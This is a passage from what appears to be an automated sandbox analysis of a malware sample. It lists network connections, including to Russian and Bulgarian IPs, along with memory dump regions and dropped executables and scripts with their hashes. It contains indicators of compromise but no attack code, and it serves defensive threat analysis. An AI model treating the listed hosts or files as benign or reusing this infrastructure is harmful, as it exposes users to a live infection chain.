| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| N/A | 195.20.16.103:18305 | tcp | |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.237.62.212:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 212.62.237.104.in-addr.arpa | udp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
| RU | 5.42.64.35:80 | 5.42.64.35 | tcp |
| US | 8.8.8.8:53 | bit.ly | udp |
| US | 67.199.248.11:443 | bit.ly | tcp |
| US | 8.8.8.8:53 | 7.254.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.64.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
Files
memory/1800-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3540-1-0x0000000002540000-0x0000000002556000-memory.dmp
memory/1800-3-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F4B0.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/3628-12-0x00000000008E0000-0x0000000000932000-memory.dmp
memory/3628-17-0x0000000074F90000-0x0000000075740000-memory.dmp
memory/3628-18-0x00000000055E0000-0x0000000005B84000-memory.dmp
memory/3628-19-0x0000000004F70000-0x0000000005002000-memory.dmp
memory/3628-20-0x0000000005110000-0x0000000005120000-memory.dmp
memory/3628-21-0x0000000005040000-0x000000000504A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6C2.exe
| MD5 | 1713300ba962c869477e37e4b31e40af |
| SHA1 | d5c4835bc910acccd28dbed0c451043ea8de95ef |
| SHA256 | 2bcdb7a75707f841615be19f4bbcb95fc6b16ce19fb7ea782c5ff43ea1be024d |
| SHA512 | 70b2a2b17c6b3a0a295baf536451ef38c6e9e292a3c967a9fc950a6de321bbac0dc45e942ef151ba81b717f8ede3166388e68ce75f2afff0ec16aea98ea742e1 |
memory/4440-26-0x0000000000A10000-0x0000000000EAE000-memory.dmp
memory/4440-27-0x0000000074F90000-0x0000000075740000-memory.dmp
memory/4440-28-0x0000000005960000-0x00000000059FC000-memory.dmp
memory/4440-29-0x0000000005A70000-0x0000000005A80000-memory.dmp
memory/3628-30-0x00000000065B0000-0x0000000006BC8000-memory.dmp
memory/3628-32-0x00000000064A0000-0x00000000065AA000-memory.dmp
memory/3628-33-0x00000000063C0000-0x00000000063D2000-memory.dmp
memory/3628-34-0x0000000007E70000-0x0000000007EAC000-memory.dmp
memory/3628-35-0x0000000007EC0000-0x0000000007F0C000-memory.dmp
memory/3628-36-0x0000000008A40000-0x0000000008AA6000-memory.dmp
memory/3628-37-0x0000000008E80000-0x0000000008ED0000-memory.dmp
memory/3628-38-0x0000000005110000-0x0000000005120000-memory.dmp
memory/4440-39-0x0000000006370000-0x0000000006538000-memory.dmp
memory/4440-40-0x0000000007640000-0x00000000077D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll
| MD5 | 544cd51a596619b78e9b54b70088307d |
| SHA1 | 4769ddd2dbc1dc44b758964ed0bd231b85880b65 |
| SHA256 | dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd |
| SHA512 | f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719 |
memory/4440-47-0x0000000005A70000-0x0000000005A80000-memory.dmp
memory/4440-46-0x0000000005A70000-0x0000000005A80000-memory.dmp
memory/4440-49-0x0000000005A70000-0x0000000005A80000-memory.dmp
memory/4440-48-0x0000000005A60000-0x0000000005A70000-memory.dmp
memory/3628-50-0x0000000074F90000-0x0000000075740000-memory.dmp
memory/4440-52-0x0000000005A70000-0x0000000005A80000-memory.dmp
memory/4440-51-0x0000000007DB0000-0x0000000007EB0000-memory.dmp
memory/2684-53-0x0000000000400000-0x000000000043C000-memory.dmp
memory/4440-54-0x0000000007DB0000-0x0000000007EB0000-memory.dmp
memory/4440-57-0x0000000005A70000-0x0000000005A80000-memory.dmp
memory/4440-55-0x0000000007DB0000-0x0000000007EB0000-memory.dmp
memory/3628-58-0x0000000005110000-0x0000000005120000-memory.dmp
memory/4440-59-0x0000000074F90000-0x0000000075740000-memory.dmp
memory/2684-60-0x0000000074F90000-0x0000000075740000-memory.dmp
memory/2684-61-0x0000000007A60000-0x0000000007A70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\412D.exe
| MD5 | 8b9a9846ed22725498334d05cd53e96b |
| SHA1 | 819487e2407b6070479a121594987160e8721ae1 |
| SHA256 | c6d0249a5f2565e25e90b9ec84dadbc3a297206374cce478c2c5511dae67c426 |
| SHA512 | 62ea545908c0c3fe2e0356d2149eba870543202ceb412583a5df7d439c93d4f1de3cf4ac3d24ba0b8ffcef7f5f641f13d01c8ff8dea43d38b24a84cfc81469d6 |
C:\Users\Admin\AppData\Local\Temp\412D.exe
| MD5 | b2352a1ad0375980b805a09e9b2da12c |
| SHA1 | 692586364edfb0c7f3de38d4f410a75ee99b6790 |
| SHA256 | 6a0c49855fd13193e5df48f663ead25b1d7d8b294fd7c1ae09e964e4228ccd12 |
| SHA512 | 532b6c0033e021aa21e67651590ec73a827ddbb1ed179c0636c22cf6a4154f01919cbdcfe7a92943ee86c2574904924229dd31bc43e27a28b65e83963c98bb48 |
memory/4092-66-0x0000000074F90000-0x0000000075740000-memory.dmp
memory/4092-67-0x0000000000250000-0x0000000001042000-memory.dmp
memory/3628-70-0x0000000009B00000-0x0000000009CC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | c6c53c63657293e4da62c4e7f1d1831b |
| SHA1 | a8379d445fb2226da97418f4d75bad07ef9290ca |
| SHA256 | 900c0640ba1e682128403dd48d4865aa07f3a63086c7e19bc8baa0ca79bd6cdf |
| SHA512 | 9033f375fa453f04734b22837f08d50b7c01156fce8cfc1536921afc8014015753e48280d266d8e71a5bb3b0a79572cdb82b08c921149d797c7494418ff85965 |
C:\Users\Admin\AppData\Local\Temp\48FE.exe
| MD5 | dc6fbf2cd9ad1f1f0ac200e9bec7ea3f |
| SHA1 | c3af9d82d270829784339331dea63f927400e0d4 |
| SHA256 | 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590 |
| SHA512 | 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f |
memory/3628-77-0x000000000A200000-0x000000000A72C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 9445be826cc1c194fe4364740ed979f9 |
| SHA1 | 4efeb5866d82d211dd1f5a8a064ab83ab837af33 |
| SHA256 | c041d73c596c5686d387cdd9043ae9a669f1525524eaa02969960789f82547c6 |
| SHA512 | a868706e191b9084ca14e8f2b85b540c7ff758dde92a91488cd2b38c327811e07900b1a3c6ca870528a4b9e5ee9b410787f69a2c419317d768f02f9a85e3929a |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | e0b201d9da0623b03d1de1b63457e7b0 |
| SHA1 | 60f1a5148b2f479efc51547e210a2ae583305b71 |
| SHA256 | 18b641a8d75f26adb52148ff99a69a790e061d130924f62c08ffcedbadf87571 |
| SHA512 | c118ec59658286d35f00e9f49ec21f1c5508c77ca7ada4d81e40b0ed221bfb4722bb18c1e95a72bdde95af8323bb70bd6bc9a6e3bfad37ce2f33fcd0a0b048ea |
C:\Users\Admin\AppData\Local\Temp\nsx4C18.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat
| MD5 | 60c9624e093baac4bef11ab4fc846111 |
| SHA1 | 07a25911c81e04608a0dc6fb065524a9da82dd65 |
| SHA256 | e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d |
| SHA512 | 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 0277dcbf0f270408ad6da03d0bc91b9a |
| SHA1 | 01fe1f3b96c9f4e64217c5437cfc0e0a73e234a7 |
| SHA256 | e19b0f1aa5c0f5ca4a97c996decb300e75a268c055715ae9e2fc6617a9441aaf |
| SHA512 | 7d089bda969c4d3a1c0f0939b9e1846e1e4e272897ee2c9399bfc92bf76d82afe471e3e61c744a0022fea04b60e803dc4a0a02b12f689899b773b8bd14540263 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 3b951c1abb0759086712224f8f6358dd |
| SHA1 | ae7c06bfc7a3cf501c9760cc5ffbc8daaafafbbf |
| SHA256 | 6e0a154c6cbc66d2401987946f4c241ed87105ea24e4a29e13d890bd4cdfd968 |
| SHA512 | acbc0fe85c65c647debca24cd3eb383189bd0a4366b92303a62be4f94422d3f2d05f2a0edcde5f3a9913495ba77980de7168a8b6df24cef64c06703df04fd1b2 |
memory/2952-116-0x00007FFC39050000-0x00007FFC39B11000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | eb531d81b8b7b4e7e6a5c91556d78281 |
| SHA1 | adfd40f48a48b0fd0e8a427e2a19b9051f946530 |
| SHA256 | 47c8e2e9026f6acd497524c3e4dd910712fae8e0f24d5979e857d9b96f9b9b8a |
| SHA512 | c38c980c83634f36ef24632bbcf2dab255016354d4f9cb2ef00ef21b1d9817cfa13a3daaecc0daa62db78d849ddf2050d93030f50083e0ddc06b035b7a7fbc11 |
C:\Users\Admin\AppData\Local\Temp\nsx4C18.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
memory/2952-117-0x0000014E75750000-0x0000014E75760000-memory.dmp
memory/2952-118-0x0000014E75750000-0x0000014E75760000-memory.dmp
memory/552-119-0x00000000008B0000-0x00000000008B9000-memory.dmp
memory/4876-121-0x0000000000400000-0x0000000000409000-memory.dmp
memory/552-120-0x00000000009C0000-0x0000000000AC0000-memory.dmp
memory/3628-124-0x0000000005110000-0x0000000005120000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arg0bq3t.cdy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2556-125-0x0000000000B40000-0x0000000000B41000-memory.dmp
memory/2952-135-0x0000014E77900000-0x0000014E77922000-memory.dmp
memory/4876-123-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 1c1bcdb0b26032497a333c49e5777e5c |
| SHA1 | ad3f475adcb7c92818a9007f26e284faab2372c5 |
| SHA256 | a503985a9cd752160db220650711b84834b3ad631497bb3133d7c73fc28dbf92 |
| SHA512 | 0f28b2c7a3a913accb98a70f6f8d4ed70a1a90bd14a0106cf41628a9314b7e42b8d917c25157fb92fc3031543ff035a0760a6bca670cd3ad9483f9eadd118313 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 7d2bf2a6b821dd9f87ad328ea27af2e5 |
| SHA1 | a32a1e0d1f401c5ba3cd4d53430fc2b61286c821 |
| SHA256 | a617ca6b1603e5a637e79c6f6d3fe36efb4eeff9cfb4df7a0a57a2a21ffedb9a |
| SHA512 | 6234081698dee53ce4f826fdc1bee44c6d5b1f68f6d13bec5186013cb5c6ea4af3a40ba544fe822ca6bb0a52c7a7d6a489ee54f6ccfcd2ab2d1d79396da5568a |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 69a86cf45d9ce53c1f497f0921770a5f |
| SHA1 | 9d92e5c7e600779be84e21fd7d54ce3e91683b04 |
| SHA256 | 7bb67b2ed4d5f7b7a6e92118e7b2a1a92c0a2720e76d59499a67861c0261d582 |
| SHA512 | 552e8b7bb8da2d9654734f48837bcbb09e23b19a99621c7cbbf47ff5954fb5fa63fb31678a9e7a0fababf312c91d0aee4f2cac0a28d3ef132ea3600c6469685e |
memory/2240-144-0x0000000000400000-0x0000000000418000-memory.dmp
memory/4624-147-0x00000000029A0000-0x0000000002DA6000-memory.dmp
memory/4092-150-0x0000000074F90000-0x0000000075740000-memory.dmp
memory/2240-149-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp
| MD5 | f448d7f4b76e5c9c3a4eaff16a8b9b73 |
| SHA1 | 31808f1ffa84c954376975b7cdb0007e6b762488 |
| SHA256 | 7233b85eb0f8b3aa5cae3811d727aa8742fec4d1091c120a0fe15006f424cc49 |
| SHA512 | f8197458cd2764c0b852dac34f9bf361110a7dc86903024a97c7bcd3f77b148342bf45e3c2b60f6af8198ae3b83938dbaad5e007d71a0f88006f3a0618cf36f4 |
memory/4624-151-0x0000000002DB0000-0x000000000369B000-memory.dmp
memory/4624-155-0x0000000000400000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-S4J2J.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Users\Admin\AppData\Local\Temp\is-S4J2J.tmp\_isetup\_isdecmp.dll
| MD5 | 3adaa386b671c2df3bae5b39dc093008 |
| SHA1 | 067cf95fbdb922d81db58432c46930f86d23dded |
| SHA256 | 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38 |
| SHA512 | bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303 |
memory/1236-171-0x0000000000550000-0x0000000000551000-memory.dmp
memory/2952-172-0x0000014E75750000-0x0000014E75760000-memory.dmp
memory/4876-287-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3540-283-0x0000000002770000-0x0000000002786000-memory.dmp